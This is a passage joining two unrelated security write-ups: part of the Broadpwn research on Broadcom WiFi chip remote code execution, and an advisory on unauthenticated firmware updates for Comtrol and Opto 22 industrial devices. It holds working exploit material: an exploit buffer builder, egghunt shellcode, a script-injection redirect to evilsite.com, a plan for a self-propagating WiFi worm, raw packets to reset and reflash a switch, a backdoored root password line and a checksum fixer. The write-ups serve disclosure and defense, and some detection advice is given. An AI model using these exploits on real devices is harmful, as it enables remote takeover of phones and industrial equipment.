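Writing 12 bytes and then 8 more into this 16-byte ring leaves the second write straddling the end of the buffer and replacing the first 4 bytes of the earlier data, which is the property that lets repeated incoming frames fill the whole region over time.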

For us, this means that all we need to do is broadcast our payload over the air and over multiple channels. As the WiFi chip repeatedly scans for available APs (this is done every few seconds even when the chip is in power saving mode), the ring buffer gets filled with our payload – giving us the perfect place to jump to and enough space to store a reasonably sized payload.

What we’ll do, therefore, is this: write a small stub of shellcode within wlc->pm, which saves the stack frame (so we can restore normal execution afterwards) and jumps to the next 32 bytes of shellcode which we store in the unused SSID string. This compact shellcode is nothing other than classic egghunting shellcode, which searches the ring buffer for a magic number which indicates the beginning of our payload, then jumps to it.
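The search step of an egghunter is, at its core, a scan for a marker. The following C sketch shows only that scan over an ordinary buffer; the function name find_after_magic and the 4-byte marker width are assumptions, and the real stub is hand-written ARM code that is not reproduced here.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Return the offset just past the first occurrence of the 4-byte `magic`
 * in buf[0..len), or -1 if the marker does not occur.
 */
long find_after_magic(const uint8_t *buf, size_t len, const uint8_t magic[4])
{
    assert(buf != NULL && magic != NULL);
    if (len < 4)
        return -1;
    for (size_t i = 0; i + 4 <= len; i++) {
        if (memcmp(buf + i, magic, 4) == 0)
            return (long)(i + 4);
    }
    return -1;
}
```

The marker needs to be a value unlikely to appear in ordinary traffic, since a false match would send execution to arbitrary data.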

 

So, time to look at the POC code. This is how the exploit buffer is crafted:

u8 *generate_wmm_exploit_buf(u8 *eid, u8 *pos) {  
  uint32_t curr_len = (uint32_t) (pos - eid);  
  uint32_t overflow_size = sizeof(struct exploit_buf_4359);  
  uint32_t p_patch = 0x16010C; // p_restore_cpsr  
  uint32_t buf_base_4359 = 0x1e7e02;  
  struct exploit_buf_4359 *buf = (struct exploit_buf_4359 *) pos;
  memset(pos, 0x0, overflow_size);
  memcpy(&buf->pm_st_field_40_shellcode_start_106, shellcode_start_bin, sizeof(shellcode_start_bin)); // Shellcode thunk  
  buf->ssid.ssid[0] = 0x41;  
  buf->ssid.ssid[1] = 0x41;  
  buf->ssid.ssid[2] = 0x41;  
  memcpy(&buf->ssid.ssid[3], egghunt_bin, sizeof(egghunt_bin));  
  buf->ssid.size = sizeof(egghunt_bin) + 3;
  buf->pm_st_field_10_pspoll_timer_58 = buf_base_4359 + offsetof(struct exploit_buf_4359, t_field_0_2); // Point pspoll timer to our fake timer object
  buf->pm_st_size_38 = 0x7a;  
  buf->pm_st_field_18_apsd_trigger_timer_66 = 0x1e7ab4;  
  buf->pm_st_field_28_82 = 0xc8;  
  buf->pm_st_field_2c_86 = 0xc8;  
  buf->pm_st_field_38_pm2_rcv_timer_98 = 0x1e819c;  
  buf->pm_st_field_3c_pm2_ret_timer_102 = 0x1e811c;  
  buf->pm_st_field_78_size_162 = 0x1a2;  
  buf->bss_info_field_0_mac1_166 = 0x84cac000;  
  buf->bss_info_field_4_mac2_170 = 0x106b9ba;
  buf->t_field_20_34 = 0x200000;  
  buf->t_field_18_26 = p_patch - 0x14; // Point field_18 to the restore_cpsr thunk  
  buf->t_field_1c_30 = buf_base_4359 + offsetof(struct exploit_buf_4359, pm_st_field_40_shellcode_start_106) + 1; // Write our shellcode address to the thunk
  curr_len += overflow_size;
  pos += overflow_size;
  return pos;
}

struct shellcode_ssid {  
  unsigned char size;  
  unsigned char ssid[31];
} STRUCT_PACKED;
 
struct exploit_buf_4359 {  
  uint16_t stub_0;  
  uint32_t t_field_0_2;  
  uint32_t t_field_4_6;  
  uint32_t t_field_8_10;  
  uint32_t t_field_c_14;  
  uint32_t t_field_10_18;  
  uint32_t t_field_14_22;  
  uint32_t t_field_18_26;  
  uint32_t t_field_1c_30;  
  uint32_t t_field_20_34;  
  uint32_t pm_st_size_38;  
  uint32_t pm_st_field_0_42;  
  uint32_t pm_st_field_4_46;  
  uint32_t pm_st_field_8_50;  
  uint32_t pm_st_field_c_54;  
  uint32_t pm_st_field_10_pspoll_timer_58;  
  uint32_t pm_st_field_14_62;  
  uint32_t pm_st_field_18_apsd_trigger_timer_66;  
  uint32_t pm_st_field_1c_70;  
  uint32_t pm_st_field_20_74;  
  uint32_t pm_st_field_24_78;  
  uint32_t pm_st_field_28_82;  
  uint32_t pm_st_field_2c_86;  
  uint32_t pm_st_field_30_90;  
  uint32_t pm_st_field_34_94;  
  uint32_t pm_st_field_38_pm2_rcv_timer_98;  
  uint32_t pm_st_field_3c_pm2_ret_timer_102;  
  uint32_t pm_st_field_40_shellcode_start_106;  
  uint32_t pm_st_field_44_110;  
  uint32_t pm_st_field_48_114;  
  uint32_t pm_st_field_4c_118;  
  uint32_t pm_st_field_50_122;  
  uint32_t pm_st_field_54_126;  
  uint32_t pm_st_field_58_130;  
  uint32_t pm_st_field_5c_134;  
  uint32_t pm_st_field_60_egghunt_138;  
  uint32_t pm_st_field_64_142;  
  uint32_t pm_st_field_68_146; // <- End  
  uint32_t pm_st_field_6c_150;  
  uint32_t pm_st_field_70_154;  
  uint32_t pm_st_field_74_158;  
  uint32_t pm_st_field_78_size_162;  
  uint32_t bss_info_field_0_mac1_166;  
  uint32_t bss_info_field_4_mac2_170;  
  struct shellcode_ssid ssid;
} STRUCT_PACKED;
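
The decimal suffix on each field name appears to be that field's byte offset within the packed struct (for example, pm_st_field_40_shellcode_start_106 sits at 2 + 9*4 + 4 + 0x40 = 106). Assuming that reading is correct, the three computed values in generate_wmm_exploit_buf() can be worked out by hand. The helper names below are hypothetical and exist only to show the arithmetic.

```c
#include <stdint.h>

/* Values copied from generate_wmm_exploit_buf() above. */
#define BUF_BASE_4359   0x1e7e02u
#define P_RESTORE_CPSR  0x16010Cu

/* Byte offsets read off the field-name suffixes (assumed to be decimal
 * offsets into the packed struct). */
#define OFF_FAKE_TIMER      2u    /* t_field_0_2 */
#define OFF_SHELLCODE_START 106u  /* pm_st_field_40_shellcode_start_106 */

/* Value stored in the pspoll timer pointer: address of the fake timer. */
uint32_t fake_timer_addr(void)
{
    return BUF_BASE_4359 + OFF_FAKE_TIMER;
}

/* Value stored in t_field_1c: address of the shellcode stub, with the
 * +1 that the original code adds. */
uint32_t shellcode_entry(void)
{
    return BUF_BASE_4359 + OFF_SHELLCODE_START + 1u;
}

/* Value stored in t_field_18: p_restore_cpsr minus 0x14. */
uint32_t timer_field_18(void)
{
    return P_RESTORE_CPSR - 0x14u;
}
```

These evaluate to 0x1e7e04, 0x1e7e6d and 0x1600f8 respectively.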

And this is the shellcode which carries out the egghunt:

__attribute__((naked)) void shellcode_start(void) {  
  asm("push {r0-r3,lr}\n"           
      "bl egghunt\n"            
      "pop {r0-r3,pc}\n");
}

void egghunt(unsigned int cpsr) {  
  unsigned int egghunt_start = RING_BUFFER_START;  
  unsigned int *p = (unsigned int *) egghunt_start;  
  void (*f)(unsigned int);
  loop:  
  p++;  
  if (*p != 0xc0deba5e)    
    goto loop;  
  f = (void (*)(unsigned int))(((unsigned char *) p) + 5); // +4 skips the magic word, +1 sets the Thumb bit
  f(cpsr);  
  return;
}
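
The egghunt above is kept as small as possible and has no bounds check. For experimenting on a host machine, a bounded variant is easier to reason about. The following is a sketch only: find_egg is a hypothetical name, the scan starts at the first word (the original skips it), and it returns an offset instead of jumping.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define EGG 0xc0deba5eu   /* magic value used by egghunt() above */

/* Scan buf one 32-bit word at a time for EGG. Returns the byte offset
 * just past the marker, or -1 if the marker is not present. Unlike
 * egghunt(), the scan stops at the end of the buffer. */
long find_egg(const uint8_t *buf, size_t len)
{
    for (size_t off = 0; off + sizeof(uint32_t) <= len; off += sizeof(uint32_t)) {
        uint32_t word;
        memcpy(&word, buf + off, sizeof word);   /* avoids unaligned reads */
        if (word == EGG)
            return (long)(off + sizeof word);
    }
    return -1;
}
```

The marker is compared in host byte order, so a test buffer should store EGG with memcpy rather than as individual bytes.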

So we have a jump to our payload, but is that all we need to do? Remember that we have seriously corrupted the wlc->pm object, and the system will not remain stable for long if we leave it that way. Also recall that one of our main objectives is to avoid crashing the system – an exploit which gives an attacker transient control is of limited value.

Therefore, before any further action, our payload needs to restore the wlc->pm object to its normal condition. Since all addresses in this object are consistent for a given firmware build, we can just copy these values back into the buffer and restore the object to a healthy state.

Here’s an example of what an initial payload will look like:

unsigned char overflow_orig[] = {    
  0x00, 0x00, 0x03, 0xA4, 0x00, 0x00, 0x27, 0xA4, 
  0x00, 0x00, 0x42, 0x43, 0x5E, 0x00, 0x62, 0x32,    
  0x2F, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0xC0, 0x0B, 0xE0, 0x05, 0x0F, 0x00,    
  0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x7A, 0x00, 
  0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x64, 0x7A, 0x1E, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0xB4, 0x7A, 0x1E, 0x00, 0x00, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0xC8, 0x00, 0x00, 0x00, 0xC8, 0x00, 
  0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,    
  0x00, 0x00, 0x9C, 0x81, 0x1E, 0x00, 0x1C, 0x81, 
  0x1E, 0x00 
};

void entry(unsigned int cpsr) {    
  int i = 0;    
  unsigned int *p_restore_cpsr = (unsigned int *) 0x16010C;
  *p_restore_cpsr = (unsigned int) restore_cpsr;
  printf("Payload triggered, restoring CPSR\n");
  restore_cpsr(cpsr);
  printf("Restoring contents of wlc->pm struct\n");
  memcpy((void *) (0x1e7e02), overflow_orig, sizeof(overflow_orig));    
  return;
}

At this stage, we have achieved our first and most important mission: we have reliable, consistent RCE against the BCM chip, and our control of the system is not transient – the chip does not crash following the exploit. At this point, the only way we will lose control of the chip is if the user turns off WiFi or if the chip crashes.

THE EXPLOIT – SECOND APPROACH

As we mentioned, there is still a problem with the above approach. For each firmware build, we’ll need to determine the correct memory addresses to be used in the exploit. And while those addresses are guaranteed to be consistent for a given build, we should still look for a way to avoid the hard work of compiling address tables for each firmware version.

The main problem is that we need a predictable memory address whose contents we control, so we can overwrite the pspoll_timer pointer and redirect it to our fake timer object. The previous approach relied on the fact that the address of wlc->pm is consistent for a given firmware build. But there’s another buffer whose address we already know: the ring buffer. And in this case, there’s an added advantage: its beginning address seems to be the same across the board for a specific chip type, regardless of build or version number.

For the BCM4359, the ring buffer’s beginning address is 0x221ec0. Therefore, if we ensure a packet we control will be written exactly to the beginning of the ring buffer, we can place our fake timer object there, and our payload immediately after it. Of course, making sure that our packet is put exactly at the beginning of the buffer is a serious challenge: We may be in an area with dozens of other APs and STAs, increasing the noise level and causing us to contend with many other packets.

In order to win the contest for the desired spot in the ring buffer, we have set up a dozen Alfa wireless adapters, each broadcasting on a different channel. By causing them to simultaneously bombard the air with packets on all channels, we have reached a situation where we successfully grab the first slot in the ring buffer about 70% of the time. Of course, this result could radically change if we move to a more crowded WiFi environment.

Once we grab the first slot, exploitation is simple: The fake timer object writes to the offset of p_restore_cpsr, overwriting it with the address of an offset within our packet in the first slot. This is where we will store our payload.

Despite the difficulty of this approach and the fact that it requires additional gear, it still offers a powerful alternative to the previous exploitation approach, in that the second approach does not require knowledge of addresses within the system.

THE NEXT STEP – PRIVILEGE ESCALATION

After achieving stable code execution on the Broadcom chip, an attacker’s natural goal would be to escape the chip and escalate their privileges to code execution on the application processor. There are three main approaches to this problem:

  1. Find a bug in the Broadcom kernel driver that handles communication with the chip. The driver and chip communicate using a packet-based protocol, so an extensive attack surface on the kernel is exposed to the chip. This approach is difficult, since, unless a way to leak kernel memory is found, an attacker will not have enough knowledge about the kernel’s address space to carry out a successful exploit. Again, attacking the kernel is made more difficult by the fact that any mistake we make will crash the whole system, causing us to lose our foothold in the WiFi chip.
  2. Use PCIe to read and write directly to kernel memory. While WiFi chips prior to the BCM4358 (the main WiFi chip used on the Samsung Galaxy S6) used Broadcom’s SDIO interface, more recent chips use PCIe, which inherently enables DMA to the application processor’s memory. The main drawback of this approach is that it will not support older phones.
  3. Wait for the victim to browse to a non-HTTPS site, then, from the WiFi chip, redirect them to a malicious URL. The main advantage of this approach is that it supports all devices across the board. The drawback is that a separate exploit chain for the browser is required.

We believe that achieving kernel code execution from the chip is a sufficiently complicated subject to justify separate research; it is therefore out of the scope of the current work. However, work has already been done by Project Zero to show that a kernel write primitive can be achieved via PCIe [d].

In the current research, our approach is to use our foothold on the WiFi chip to redirect the user to an attacker-controlled site. This task is made simple by the fact that a single firmware function, wlc_recv(), is the starting point for processing all packets. The signature of this function is as follows:

void wlc_recv(wlc_info *wlc, void *p);

The argument p is a pointer to HNDRTE’s implementation of an sk_buff. It holds a pointer to the packet data, as well as the packet’s length and a pointer to the next packet. We will need to hook the wlc_recv function call, dump the contents of each packet that we receive, and look for packets that encapsulate unencrypted HTTP traffic. At this point, we will modify the packet to include a <script> tag, with the code: “top.location.href = http://www.evilsite.com”.
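
To make the shape of the packet object concrete, here is a host-side sketch that walks a chain of packets and counts those containing plaintext HTTP. Everything in it is an assumption for illustration: struct pkt, its field order, and the "HTTP/1." marker are hypothetical stand-ins, not the firmware's actual layout or logic.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the packet object; the real layout differs. */
struct pkt {
    struct pkt    *next;   /* next packet in the chain, or NULL */
    const uint8_t *data;   /* packet bytes */
    size_t         len;    /* number of bytes at data */
};

/* Return 1 if needle occurs anywhere in the first hlen bytes of hay. */
static int contains(const uint8_t *hay, size_t hlen, const char *needle)
{
    size_t nlen = strlen(needle);
    if (nlen == 0 || nlen > hlen)
        return 0;
    for (size_t i = 0; i + nlen <= hlen; i++)
        if (memcmp(hay + i, needle, nlen) == 0)
            return 1;
    return 0;
}

/* Walk the chain and count packets that carry an HTTP/1.x marker. */
size_t count_http_packets(const struct pkt *p)
{
    size_t n = 0;
    for (; p != NULL; p = p->next)
        if (contains(p->data, p->len, "HTTP/1."))
            n++;
    return n;
}
```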

THE FIRST WIFI WORM

The nature of the bug, which can be triggered without any need for authentication, and the stability of the exploit, which deterministically and reliably reaches code execution, lead us to the return of an old friend: the self-propagating malware, also known as the “worm”.

Worms died out around the end of the last decade, together with their essential companion, the remote exploit. They have died out for the same reason: software mitigations have become too mature, and automatic infection over the network became a distant memory. Until now.

Broadpwn is ideal for propagation over WLAN: It does not require authentication, doesn’t need an infoleak from the target device, and doesn’t require complicated logic to carry out. Using the information provided above, an attacker can turn a compromised device into a mobile infection station.

We implemented our WiFi worm with the following steps:

  • In the previous section, we started running our own payload after restoring the system to a stable state and preventing a chip crash. The payload will hook wlc_recv, in a manner similar to the one shown above.
  • The code in wlc_recv_hook will inspect each received packet and determine whether it is a Probe Request. Recall that wlc_recv essentially behaves as if it runs in monitor mode: all packets received over the air are handled by it, and only tossed out later if they are not meant for the STA.
    If the received packet is a Probe Request with the SSID of a specific AP, wlc_recv_hook will extract the SSID of the requested AP and start impersonating that AP by sending out a Probe Response to the STA.
  • In the next stage, wlc_recv should receive an Authentication Open Sequence packet, and our hook function should send a response. This will be followed by an Association Request from the STA.
  • The next packet we will send is the Association Response containing the WMM IE which triggers the bug. Here, we’ll make use of the fact that we can crash the targeted chip several times without alerting the user, and start sending crafted packets adapted to exploit a specific firmware build. This will be repeated until we have brute forced the correct set of addresses. Alternatively, the second approach, which relies on spraying the ring buffer and placing the fake timer object and the payload at a deterministic location, can also be used.
  • Running an Alfa wireless adapter in monitor mode for about an hour in a crowded urban area, we sniffed hundreds of SSID names in Probe Request packets. Of the devices that sent them, approximately 70% were using a Broadcom WiFi chip [e]. Even assuming moderate infection rates, the impact of a Broadpwn worm running for several days is potentially huge.

Old school hackers often miss the “good old days” of the early 2000s, when remotely exploitable bugs were abundant, no mitigations were in place to stop them, and worms and malware ran rampant. But with new research opening previously unknown attack surface such as the BCM WiFi chip, those times may just be making a comeback.

References

[a] While KASLR is still largely unsupported on Android devices, the large variety of kernels out there effectively means that an attacker can make very few assumptions about an Android kernel’s address space. Another problem is that any misstep during an exploit will cause a kernel panic, crashing the device and drawing the attention of the victim.

[b] The BCM43xx family has been the subject of extensive security research in the past. Notable research includes Wardriving from Your Pocket (https://recon.cx/2013/slides/Recon2013-Omri%20Ildis%2C%20Yuval%20Ofir%20and%20Ruby%20Feinstein-Wardriving%20from%20your%20pocket.pdf) by Omri Ildis, Yuval Ofir and Ruby Feinstein; One Firmware to Monitor ’em All (http://archive.hack.lu/2012/Hacklu-2012-one-firmware-Andres-Blanco-Matias-Eissler.pdf) by Andres Blanco and Matias Eissler; and the Nexmon project by SEEMOO Lab (https://github.com/seemoo-lab/nexmon). These projects aimed mostly to implement monitor mode on Nexus phones by modifying the BCM firmware, and their insights greatly assisted the author with the current research. More recently, Gal Beniamini of Project Zero has published the first security-focused report about the BCM43xx family (https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi_4.html), and has discovered several bugs in the BCM firmware.

[c] This function does not exist in the source code that we managed to obtain, so the naming is arbitrary.

[d] Gal Beniamini’s second blog post about BCM deals extensively with this issue (https://googleprojectzero.blogspot.co.il/2017/04/over-air-exploiting-broadcoms-wi-fi_11.html). And while a kernel read primitive is not demonstrated in that post, the nature of the MSGBUF protocol seems to make it possible.

[e] This is an estimate, and was determined by looking up the OUI part of the sniffed device’s MAC address.

Firmware Updates Made Easy

Contributors: David Barksdale of Exodus Intelligence, Independent Security Researcher Jeremy Brown

These are two vulnerabilities that allow a remote unauthenticated attacker to update firmware. If the device is configured with MAC or IP filtering, the attacker can bypass filtering if they have access to the same network segment as the device.

Comtrol RocketLinx ES8510-XTE

Product Overview

The Comtrol RocketLinx ES8510-XTE is a managed industrial Ethernet switch. It has seven 10/100BASE-TX ports and three additional ports which can be allocated among any of three 10/100BASE-TX ports and three SFP ports. It has two digital-in and two digital-out ports which can be used for alarms or triggering events. It also has an RS-232 console port.

The switch can be managed with a Command Line Interface (CLI) accessible over the console port, SSH, and Telnet; with a web interface; SNMP; and with a Windows program called PortVision DX.

Vulnerability

The CLI, web interface, and SNMP all require authentication; however, the PortVision program can carry out certain management tasks without authentication. PortVision sends commands to the switch via UDP packets to port 5010. The switch can be configured to filter packets based on an IP and MAC whitelist to prevent attackers from sending unauthorized commands to the switch. This can be bypassed and an attacker can use the PortVision protocol to upload and flash a backdoored firmware to the switch.

Because the PortVision protocol lacks authentication and can upload and flash firmware files, which also lack cryptographic authentication, an attacker can install a backdoor in the switch. The PortVision protocol is also session-less UDP, allowing an attacker to bypass IP and MAC filtering by sending spoofed packets to the switch.

Comtrol has published firmware version 2.7d, which allows users to disable the PortVision service; in earlier versions the service is always available.

PortVision Protocol

PortVision sends requests to network devices using UDP on port 5010, either to the IP broadcast address or unicast to a specific IP. Responses are always sent to the IP broadcast address and the UDP source and destination ports swapped from the request. Both requests and responses have the same format. The data format is a sequence of records having three parts: a 32-bit big-endian type code, a 32-bit big-endian length, and a variable-sized value with the specified length. The type code of the first record in a request is the type of the request and the value of this record is unused. The following records are parameters to the request. The responses usually have a record with an acknowledge type code to match the request, but it is not always the first record in the response. The known type codes are listed below.

PortVision Protocol Record Types

Type Code  Description
1          Manufacturer string
2          Model string
3          MAC address (6 bytes)
4          IP address (4 bytes)
5          IP netmask (4 bytes)
6          IP gateway (4 bytes)
7          Discovery request
8          Discovery acknowledgement
11         IP configuration request
12         IP configuration acknowledgement
21         Configuration file backup request
24         Configuration file restore request
27         Configuration file load default request
25         Reset to factory defaults acknowledgement
31         Firmware upgrade request
32         Firmware upgrade acknowledgement
33         Firmware upgrade error string
34         Version string
35         Bootloader upgrade request
43         TFTP clear file request (clears /home/Quaaga.conf and /home/firmware.bin)
44         Reboot request
45         Reset to factory defaults request
91         LED signal on request
92         LED signal off request
94         SFP check request
111        Self-test request

The IP configuration, factory reset, and reboot requests require a MAC address record matching the network device intended to carry out the request.

Disabling Security

The switch can be configured with IP and MAC whitelists. The attacker can discover a whitelisted IP address by sending a PortVision discovery request to the IP broadcast address from every IP address in a subnet and looking for responses. The response from the switch is also sent to the IP broadcast address. In order to determine which IP address was in the whitelist, each discovery request is sent from a unique UDP source port; the discovery reply is sent back to the same port. The MAC filtering is bypassed by sending packets from the Ethernet broadcast address (FF:FF:FF:FF:FF:FF), which is always allowed through the filter. This can only be done if the attacker is on the same network segment as the switch.

The discovery request has one record of type 7, length 1, and data 1:

00 00 00 07 00 00 00 01 01
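
The record format (32-bit big-endian type, 32-bit big-endian length, then the value) is simple enough to encode by hand. The sketch below reproduces the nine bytes shown above; the function names pv_put_record and put_be32 are hypothetical and are not part of any Comtrol software.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Store v at out as a 32-bit big-endian integer. */
static void put_be32(uint8_t *out, uint32_t v)
{
    out[0] = (uint8_t)(v >> 24);
    out[1] = (uint8_t)(v >> 16);
    out[2] = (uint8_t)(v >> 8);
    out[3] = (uint8_t)v;
}

/* Append one record (type, length, value) at out. Returns the number of
 * bytes written, or 0 if the record does not fit in cap bytes. */
size_t pv_put_record(uint8_t *out, size_t cap, uint32_t type,
                     const void *value, uint32_t len)
{
    if (cap < 8 || len > cap - 8)
        return 0;
    put_be32(out, type);
    put_be32(out + 4, len);
    if (len)
        memcpy(out + 8, value, len);
    return 8 + (size_t)len;
}
```

Calling pv_put_record(buf, sizeof buf, 7, &one, 1) with one set to 1 yields the discovery request bytes 00 00 00 07 00 00 00 01 01. Multi-record messages are built by calling it repeatedly and advancing the output pointer by the return value.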

The example discovery reply below has the following records:

Manufacturer string: Comtrol

Model string: ES8510-XTE

Discovery acknowledgement: ack

IP address: 10.100.0.5

IP netmask: 255.255.255.0

MAC address: 00:c0:4e:30:01:93

Version string: v2.7c (b1.6.2.12)

Type 9: 00 00 00 00

IP gateway: 10.100.0.1

Type 222: 00 00 00 00

00000000 00 00 00 01 00 00 00 07 43 6f 6d 74 72 6f 6c 00 ........ Comtrol.
00000010 00 00 02 00 00 00 0a 45 53 38 35 31 30 2d 58 54 .......E S8510-XT
00000020 45 00 00 00 08 00 00 00 03 61 63 6b 00 00 00 04 E....... .ack....
00000030 00 00 00 04 0a 64 00 05 00 00 00 05 00 00 00 04 .....d.. ........
00000040 ff ff ff 00 00 00 00 03 00 00 00 06 00 c0 4e 30 ........ ......N0
00000050 01 93 00 00 00 22 00 00 00 11 76 32 2e 37 63 20 .....".. ..v2.7c
00000060 28 62 31 2e 36 2e 32 2e 31 32 29 00 00 00 09 00 (b1.6.2. 12).....
00000070 00 00 04 00 00 00 00 00 00 00 06 00 00 00 04 0a ........ ........
00000080 64 00 01 00 00 00 de 00 00 00 04 00 00 00 00 -- d....... .......
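
A reply like the one above can be walked record by record. The following sketch looks up the first record of a given type; pv_find_record and get_be32 are hypothetical names, and the only format assumption is the type/length/value layout described earlier.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a 32-bit big-endian integer from p. */
static uint32_t get_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Find the first record with the given type code. On success, returns a
 * pointer to the record's value and stores its length in *len. Returns
 * NULL if the type is absent or a record runs past the end of msg. */
const uint8_t *pv_find_record(const uint8_t *msg, size_t msg_len,
                              uint32_t type, uint32_t *len)
{
    size_t off = 0;
    while (msg_len - off >= 8) {
        uint32_t t = get_be32(msg + off);
        uint32_t l = get_be32(msg + off + 4);
        off += 8;
        if (l > msg_len - off)
            return NULL;            /* truncated record */
        if (t == type) {
            *len = l;
            return msg + off;
        }
        off += l;                   /* skip this record's value */
    }
    return NULL;
}
```

Applied to the dump above, looking up type 4 returns the four bytes 0a 64 00 05, that is, 10.100.0.5. Strings such as the model name are not NUL-terminated in the packet, so the returned length must be used.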

Once a whitelisted IP is found, security can be disabled by issuing a factory reset request:

00000000 00 00 00 2d 00 00 00 01 01 00 00 00 03 00 00 00
00000010 06 00 c0 4e 30 01 93

The IP configuration from the discovery reply above can then be restored by issuing an IP configuration request:

00000000 00 00 00 0b 00 00 00 01 01 00 00 00 03 00 00 00
00000010 06 00 c0 4e 30 01 93 00 00 00 04 00 00 00 04 0a
00000020 64 00 05 00 00 00 05 00 00 00 04 ff ff ff 00 00
00000030 00 00 06 00 00 00 04 0a 64 00 01

If only IP filtering is configured, and the attacker already knows the MAC and IP of the switch as well as an IP address on the whitelist, and can send packets to the switch with a spoofed IP source address, then the firmware update can be carried out from outside the local network segment and without the need for a factory reset.

Backdooring the Firmware

A backdoored firmware image is created by extracting the parts of the 2.7c firmware image (the kernel, the squashfs filesystem, and the trailer), modifying the /etc/passwd file to allow the root user to log in over SSH, and then recombining the parts and updating the checksum in the trailer.

Firmware Parts

Offset    Size      Description
0         0x100000  Kernel
0x100000  0x459000  SquashFS Root
0x559000  0x1000    Trailer

The squashfs filesystem can be extracted and re-made using the squashfs-2.2-r2-7z code from Firmware Mod Kit. The only modification made is to give root the password “exodus” and the shell /bin/sh.

root:$1$$xNQSqSIqPHr/jbk09AEDa1:0:0:root:/home:/bin/sh

The new squashfs filesystem is combined with the original kernel and trailer parts and the checksum in the trailer is updated with the following C program.

#include <endian.h>
#include <stdint.h>
#include <stdio.h>

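int main(int argc, char **argv)
{
  if (argc != 2) {
    fprintf(stderr, "usage: %s <firmware image>\n", argv[0]);
    return -1;
  }

  // open for update; the image is patched in place
  FILE *fp = fopen(argv[1], "r+b");
  if (!fp) {
    perror("fopen");
    return -1;
  }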

  // sum every little-endian 32-bit word in the file
  uint32_t checksum = 0;
  uint32_t buf[1024];
  int i;
  while (1024 == fread(buf, 4, 1024, fp)) {
    for (i = 0; i < 1024; i++)
      checksum += le32toh(buf[i]);
  }

  // subtract out the last block (the trailer), which is still in buf;
  // this relies on the file size being a multiple of 4096
  for (i = 0; i < 1024; i++)
    checksum -= le32toh(buf[i]);
  printf("checksum = 0x%08X\n", checksum);

  // print out the obfuscated product-version string
  printf("Firmware Version: ");
  uint8_t *bytes = (uint8_t *)buf;
  for (i = 791; i < 791 + 34; ++i) {
    bytes[i] -= 103;
    printf("%c", bytes[i]);
  }
  printf("\n");

  // checksum is stored in little endian at offset 283
  fseek(fp, -4096 + 283, SEEK_CUR);
  checksum = htole32(checksum);
  printf("writing checksum at offset %ld\n", ftell(fp));
  fwrite(&checksum, 4, 1, fp);
  fclose(fp);
}

Flashing the Firmware

The backdoored firmware is transferred using TFTP to the destination path /home/firmware.bin on the switch. Then a PortVision request is sent to command the switch to flash the firmware:

00 00 00 1f 00 00 00 01 01

And another to reboot the switch:

00000000 00 00 00 2c 00 00 00 01 01 00 00 00 03 00 00 00
00000010 06 00 c0 4e 30 01 93

Detection Guidance

Exploitation attempts can be detected by monitoring network traffic for unexpected TFTP and PortVision traffic. The PortVision software periodically polls the network with discovery requests, but firmware upgrade requests should be rare and occur only during planned maintenance.
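
As a starting point for such monitoring, the request type can be read from the first four bytes of any UDP payload sent to port 5010. The sketch below flags requests that change device state; the function name and the choice of which type codes count as sensitive are our own assumptions, drawn from the record type table above.

```c
#include <stddef.h>
#include <stdint.h>

/* Read a 32-bit big-endian integer from p. */
static uint32_t get_be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Return 1 if a UDP payload addressed to port 5010 begins with a request
 * type that modifies the switch, 0 otherwise. */
int pv_is_sensitive_request(const uint8_t *payload, size_t len)
{
    if (len < 8)                    /* too short for a record header */
        return 0;
    switch (get_be32(payload)) {
    case 11:   /* IP configuration request */
    case 24:   /* Configuration file restore request */
    case 31:   /* Firmware upgrade request */
    case 35:   /* Bootloader upgrade request */
    case 44:   /* Reboot request */
    case 45:   /* Reset to factory defaults request */
        return 1;
    default:
        return 0;
    }
}
```

Discovery requests (type 7) are deliberately not flagged, since PortVision sends them routinely.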

Opto 22 OPTEMU-SNR-DR2

Product Overview

The Opto 22 OPTEMU-SNR-DR2 is an energy monitoring and control device. It can monitor two KY or KYZ pulsing devices and up to 64 data inputs from Modbus devices over serial or Ethernet. It has four relay outputs for controlling equipment or signaling other energy or building management systems.

The device can be managed over Ethernet using the OptoMMP, PAC Control, FTP, and SNMP protocols.

The latest firmware as of this publication (version 9.2b) is vulnerable.

Vulnerability

The FTP and SNMP protocols both support authentication; however, the OptoMMP and PAC Control protocols do not. The OptoMMP protocol can be used for administrative tasks like modifying IP filtering rules and the credentials used for FTP authentication. The PAC Control protocol is not used in this exploit but also provides a high level of access to the device’s functions.

The device does not use cryptographic authentication to verify new firmware images and will accept a malicious firmware uploaded over FTP. The FTP authentication credentials can be read directly from the device using the OptoMMP protocol, which itself has no authentication. The OptoMMP protocol has a session-less UDP mode, allowing an attacker to bypass IP filtering by sending spoofed packets to the device.

OptoMMP Protocol

The OptoMMP protocol is documented in the OptoMMP Protocol Guide. The protocol is based on IEEE 1394 and presents a memory map which can be read and written by byte addresses. It can be accessed via TCP or UDP on port 2001. The memory addresses relevant to this exploit are listed below.

OptoMMP Security Fields

Address         Size  Description
0xfffff03a0010  0x4   FTP port
0xfffff03d0000  0x40  FTP username
0xfffff03d0040  0x40  FTP password
0xfffff03a0020  0x4   IP Filter Address
0xfffff03a0024  0x4   IP Filter Mask
(eight address-mask pairs omitted)
0xfffff03a0068  0x4   IP Filter Address
0xfffff03a006c  0x4   IP Filter Mask
0xfffff0300080  0x20  Device’s part number

Disabling Security

